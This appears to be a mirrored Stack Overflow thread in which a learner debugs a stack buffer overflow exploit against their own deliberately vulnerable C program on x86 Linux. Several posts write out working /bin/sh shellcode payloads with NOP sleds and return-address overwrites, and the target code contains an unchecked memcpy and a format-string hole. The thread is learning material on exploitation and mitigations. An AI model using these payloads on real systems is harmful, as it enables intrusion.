简体   繁体   中英

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow:

#include <stdio.h>

int main(int argc, char *argv[]) {

    char buf[256];
    memcpy(buf, argv[1],strlen(argv[1]));
    printf(buf);

}

I'm trying to overflow with this code:

$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")

When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.

Does anyone see the problem? Note: My python may be wrong.


UPDATE

What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,

$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")

UPDATE

Could someone be kind enough to exploit this overflow yourself on linux x86 and post the results?


UPDATE

Nevermind ya'll, I got it working. Thanks for all your help.


UPDATE

Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.

All Im doing is overflowing the stack at the beginning and pointing my shellcode there.

Like so,

r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')

This should point to the A's. Now what I dont understand is why my address at the end gets changed in gdb.

This is what gdb gives me,

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()

The \\xcc gets changed to \\xcd. Could this have something to do with the error I get with gdb?

When I fill that address with "B"'s for instance it resolves fine with \\x42\\x42\\x42\\x42. So what gives?

Any help would be appreciated.

Also, I'm compiling with the following options:

gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c

It's really odd because any other address works except the one I need.


UPDATE

I can successfully spawn a shell with the following in gdb,

$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")

But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spwan a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.

For instance, now when I run the following I get this in gdb...

Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')

Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()

This seems to be caused by execstack be turned on.


UPDATE

Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

There are several protections, for the attack straight from the compiler. For example your stack may not be executable.

readelf -l <filename>

if your output contains something like this:

GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4

this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).

Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.

if your are trying this on your own program consider removing some of the protections with gcc commands:

gcc -z execstack

Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.

$(python -c "print '\\x90'*37 +'\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80' + 'A'*200 + '\\xc8\\xf4\\xff\\xbf'")

Note that in the address that should be placed inside the instruction pointer you can modify the last hex digits to point somewhere inside your nops and not necessarily at the beginning of your buffer.

Of course gdb should become your best friend if you are trying something like that.

Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...


It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.

Assuming a POSIX OS (eg linux), the kernel will set the stack pointer at a fixed address.

The kernel does the following:

It calculates how much space is needed for the environment variable strings (ie strlen("HOME=/home/me") + 1 for all environment variables and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (eg envcount ) and creates an char *envp[envcount + 1] on the stack and fills in the envp values with pointers to the given strings. It null terminates this envp

A similar process is done for the argv strings.

Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (eg _start from crt0.o ) which does some init and then calls main(argc,argv,envp)

This is [sort of] what the stack looks like when main gets called:

"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"

// alignment pad ...

char *envp[4] = {
    // address of "HOME" string
    // address of "LOGNAME" string
    // address of "SHELL" string
    NULL
};

// string for argv[0] ...
// string for argv[1] ...
// ...

char *argv[] = {
    // pointer to argument string 0
    // pointer to argument string 1
    // pointer to argument string 2
    NULL
}

// possibly more stuff put in by ELF interpreter ...

// possibly more stuff put in by _start function ...

On an x86 , the argc , argv , and envp pointer values are put into the first three argument registers of the x86 ABI.


Here's the problem [problems, plural, actually] ...

By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC .

And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (eg <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,... ) would only transfer the first three bytes and not the entire shell code program.

Nor do you have a good idea as to what the stack pointer value is.

Also, you need to find the memory word on the stack that has the return address in it (ie this is what the start function's call main asm instruction pushes).

This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (eg buf ). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.

Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.


Here's the [easy] solution ...

gcc has some intrinsic functions that can help: __builtin_return_address , __builtin_frame_address .

So, get the value of the real return address from the intrinsic [call this retadr ]. Get the address of the stack frame [call this fp ].

Starting from fp and incrementing (by sizeof(void*) ) toward higher memory, find a word that matches retadr . This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8

So, then do: *fp = argv[1] and return.

Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.


Here is some example code that works:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

void
shellcode(void)
{
    static char buf[] = "shellcode: hello\n";
    char *cp;

    for (cp = buf;  *cp != 0;  ++cp);

    // NOTE: in real shell code, we couldn't rely on using this function, so
    // these would need to be the CPP macro versions: _syscall3 and _syscall2
    // respectively or the syscall function would need to be _statically_
    // linked in
    syscall(SYS_write,1,buf,cp - buf);
    syscall(SYS_exit,0);
}

int
main(int argc,char **argv)
{
    void *retadr = __builtin_return_address(0);
    void **fp = __builtin_frame_address(0);
    int iter;

    printf("retadr=%p\n",retadr);
    printf("fp=%p\n",fp);

    // NOTE: for your example, replace:
    //   *fp = (void *) shellcode;
    // with:
    //   *fp = (void *) argv[1]

    for (iter = 20;  iter > 0;  --iter, fp += 1) {
        printf("fp=%p %p\n",fp,*fp);
        if (*fp == retadr) {
            *fp = (void *) shellcode;
            break;
        }
    }

    if (iter <= 0)
        printf("main: no match\n");

    return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:

unsigned long printesp(void){
    __asm__("movl %esp,%eax");
}

And called it at the end of main right before Return to get an idea where the stack was. From there I just played with that value subtracting 4 from the printed ESP until it worked.

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM